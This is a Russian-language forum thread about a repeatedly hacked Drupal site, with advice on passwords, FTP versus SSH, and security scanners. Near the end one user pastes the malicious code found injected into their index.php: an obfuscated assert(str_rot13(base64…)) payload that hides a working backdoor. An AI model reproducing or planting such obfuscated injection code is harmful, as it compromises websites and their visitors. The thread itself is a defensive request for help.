Зачастую ломают сайт, причем довольно "бережно". Только заменяют содержимое index.php. Причем первый прецедент был довольно давно, сейчас за неделю 2 случая. Права на файл 644. С чего начать, как проанализировать, где находится дыра в безопасности? Может ли быть поломан фтп? Если он поломан, то почему только index.php меняют, а не делают более сложные махинации?
Комментарии
Как узнал что взломали?
Какой фтп?у меня win scp я надеюсь что он безопасный. ПОменяй все пороли не сохраняй пароли.Я бы переустановил vps,сменил все данные.
...
Могу помочь кстати. Проконсультировать.
пароли поди в фтпшнике хранишь?
взломать могут и хостера.
Александр_Броневой. Элементарно, при входе на сайт страница совсем другая. Бангладеш Тим вроде фтп работает через pure_ftp, пароли хранятся в MySQL, там они даже не шифруются.
перефразирую - пароли от фтп где храните?
Вы имеете в виду, что вот создаю я фтп-соединения и забиваю туда данные для коннекта, то есть там пароль не следует хранить? Дурень я, что могу сказать. До меня так работали и меня так научили.
Ну это повезло.Нормальный хакер так бы взломал,что вы бы и не заметили.Это было бы страшнее.А так писюк какой то балуется.Восстановить сайт из бекапа и освежить весь сервак,пароли сменить,переустановить желательно сервер с новыми данными.
А если вы еще и пороли сохраняете тогда вас грех не наказать
Еще раз говорю, весь фтп работает на pure-ftp c использованием бд, то есть логины и пароли там хранятся, все бы ничего, но меня удивляет, что там пароли в незашифрованном виде хранятся, вся ВДСка была настроена еще до меня. А так все данные хрнаятся локально. Доступа к ним нет.
FTP и безопасность - несовместимые вещи..
логин-пароль (да и сами данные) передаются по сети в открытом виде(не зашифрованные)..
троян на компе или маршрутизаторе, сниффер в локальной сети и т.п., и ваши пароли уплыли..
SSH - и голова не болит..
шел залили.
Причем могли и соседу по серверу залить
о, кажись, моя тема )
Divan Tapir, прогони манулом (https://yandex.ru/promo/manul/#about) + https://www.drupal.org/project/hacked + https://www.drupal.org/project/security_review + https://www.drupal.org/project/drupalgeddon + https://www.drupal.org/project/site_audit.
результат сюда. там дальше можно думать.
да че думать. движок обновляй да пользователей подозрительных вычищай. не сделаешь за бангладешом x-sec team подтянется с роликом о тяжелой жизни в сирии и что асад тиран. песня завораживающая. на слезу пробмвает
Пока что могу сказать: в xferlog ничего нет, только моя работа отображается. Буду пробовать, как говорит господин ttenz. Hacked у меня стоит довольно давно.
У меня проверка манулом зависла на проверке локального репозитория гита =/ причем конкретно так, уже часа 3-4 висит на нем.
ок, пропускай. тогда давай со 2 пункта.
Гугл ещё не сообщил о взломе?, если нет, то время ещё есть, а то понизит или выкинет из поиска.
На кой хрен вам какие-то манулы если есть гит? git status и всё как бы.
Да вроде нет. Молчит а насчет гита, спасибо, что-то даже не подумал
git status мне ничего не дал, Итак, какую инфу дал мне Hacked:
1) В ядре ничего не обнаружил.
Измененные файлы:
Все изменения были сделаны довольно давно, перепроверил, ничего подозрительного не обнаружил.
2) Дальше список измененных модулей и их файлов:
Chaos tool suite (ctools) 7.x-1.0:
IMCE 7.x-1.5
Vote Up/Down 7.x-1.0-alpha1
Wysiwyg 7.x-2.1
У всех файлов изменения датируются 2012-2013 годами. Пересмотрел все, ничего там нет. Пока пробую security_review.
Вот что обнуружил: tmp/hacked-cache-root/hackedProjectWebFilesDownloader/ ну и весь tmp завален подобным, я его удалил, почему гит его не обнаружил, пока не ясно.
почему и не люблю гит в этом плане, подозреваю, что она была в исключениях.
интересно бы посмотреть содержимое файла index.php (код)
Ну он сразу же в первую очередь был вычищен мною. Просто надо было хоть сделать видимость, что сайт не поломан. Естественно, что там до кучи всего было напихано. Сейчас там стандартный код:
<?php
define
('DRUPAL_ROOT', getcwd());require_once DRUPAL_ROOT . '/includes/bootstrap.inc';
drupal_bootstrap(DRUPAL_BOOTSTRAP_FULL);
menu_execute_active_handler();?>
понятно. возможно там были указания к каким папкам он обращается. ну да ладно, делай 4,5 шаг. уверен, что пароли ты везде сменил и запомнил в памяти своего разума, но не в компе и проверил права на tmp, если она тебе нужна, надеюсь что, не 777.
что за хостинг?
Судя по всему это кэш модуля hacked.
http://habrahabr.ru/post/240721/ обновляемся господа )
Кстати вот вполне. Знаю некоторые сайты работают на 7.2 еще)))))
Это не так делается.
sprinter_90 Обновился уже давно. По крайней мере ядро обновлено.
Очень любопытно, и как же?
ttenz, sprinhost, но там VDS'ка. Настройкой сервера я не занимался, да я и не имею сильных познаний в этой области. До меня человек работал.
Решил для фтп оставить только папку с темой: перенес домашнюю дерикторию фтп из корня сайта и сделал симлинк на папку с темой сайта.
??
рекомендую использовать ssh, срочно.
фтп вырубить.
что site_audit показал? не затягивай, это серьезно.
Не стал пока создавать новую тему. Очень похожий случай. Заметил, что сайт стал грузиться раз на пятый-седьмой. Посещалово упало на 40%. Посмотрел, а в корневой папке сайта добавился файл "ch" без расширения в котором, при открытии его нотпадом написано "windows-1251". И файл index.php имеет ту же дату модификации, что и дата создания файла "ch". Дата изменения/создания файлов примерно совпадает с началом глюков на сайте (вчера вечером все было норм, сегодня вечером глючит, файлы созданы прошедшей ночью).
Сравнил содержание бэкапного индекс пхп и нового. Обнаружил интересную вставочку:
<?php
//###==###
error_reporting(0);
$strings = "as";$strings .= "sert";
@$strings(str_rot13('riny(onfr64_qrpbqr("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"));'));
//###==###?>
Вот такие дела. Пока что исправил последствия, удалив "ch" и заменив индекс.пхп на бэкапный. Еще не разобрался, где дыра, как латать и есть ли еще места, где хакер порылся.
Версия ядра 6.35
Версия CCK 6.2.8
Сменил все пароли, пока проблем больше не обнаруживается.
все таки посоветую правильно настроить сервер - http://saitodelatel.ru/nastroyka-servera-nginx-s-konfiguraciey-perusio-p... (там на примере нестабильного дистрибутива, сейчас уже можно на стабильном самом новом)
у меня такое было, поменяю пароли всё тихо, потом опять, в самое неподходящее время, пока правильно не настроил.